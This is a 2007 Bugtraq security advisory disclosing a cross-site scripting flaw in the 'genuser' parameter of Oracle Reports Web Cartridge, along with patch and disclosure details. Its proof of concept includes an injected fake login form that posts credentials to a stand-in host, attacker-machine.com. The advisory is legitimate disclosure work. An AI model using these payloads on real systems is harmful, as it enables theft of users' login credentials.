lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <45AE6FD2.8010702@isecauditors.com>
Date: Wed, 17 Jan 2007 19:49:54 +0100
From: ISecAuditors Security Advisories <advisories@...cauditors.com>
To: bugtraq@...urityfocus.com
Subject: [ISecAuditors Security Advisories] Oracle Reports Web Cartridge (RWCGI60)
 vulnerable to XSS

=============================================
INTERNET SECURITY AUDITORS ALERT 2007-001
- Original release date: January 17, 2007
- Last revised: January 17, 2007
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================

I. VULNERABILITY
-------------------------
Oracle Reports Web Cartridge (RWCGI60) vulnerable to XSS.

II. BACKGROUND
-------------------------
The Reports Web CGI or Web Cartridge is required for the Reports
Server when using the Oracle Application Server (OAS) to process
report requests from Web clients.

III. DESCRIPTION
-------------------------
Improper validation in "genuser" parameter allows to inject arbitrary
code script/HTML that will be executed in the client browser.

This is specially serious in authentication forms where a malicious
user can obtain the credentials of authentication of other users.

IV. PROOF OF CONCEPT
-------------------------
URL original:
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>

This request return a page with an authentication form (with User
Name, Password, and Database fields).

With a POST method (the rwcgi60 accept both methods: GET and POST),
the user send:
username=&password=&database=&authtype=D&genuser=&server=<oracle-reports-server>&nextpage=<next-page>

A malicious user can modify the value of the "genuser" parameter and
inject arbitrary script/HTML code:

-- Example 1 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=User
Name<script>alert('Vulnerable to XSS attack!');</script>


--- Example 2 ---
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><form
name='AttackerForm'

action='http://attacker-machine.com/credentials'>User Name

V. BUSINESS IMPACT
-------------------------
An attacker can spoof the session of other authenticated users,
obtains his authentication credentials, or deface the authentication
form page.

VI. SYSTEMS AFFECTED
-------------------------
Oracle9i Application Server Release 2, version 9.0.2.3

VII. SOLUTION
-------------------------
The January 2007 CPU (Critical Patch Update) contain fixes for this
vulnerability.

VIII. REFERENCES
-------------------------
-
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
January   17, 2007:  Initial release

XI. DISCLOSURE TIMELINE
-------------------------
April     23, 2006: Vulnerability acquired by
                    Internet Security Auditors
April     24, 2006: Initial vendor notification sent.
April     29, 2006: Initial response of the vendor
January   16, 2007: The vendor fixed the vulnerability in the CPU.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security

Auditors, S.L. accepts no responsibility for any damage caused by the
use or misuse of this information.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ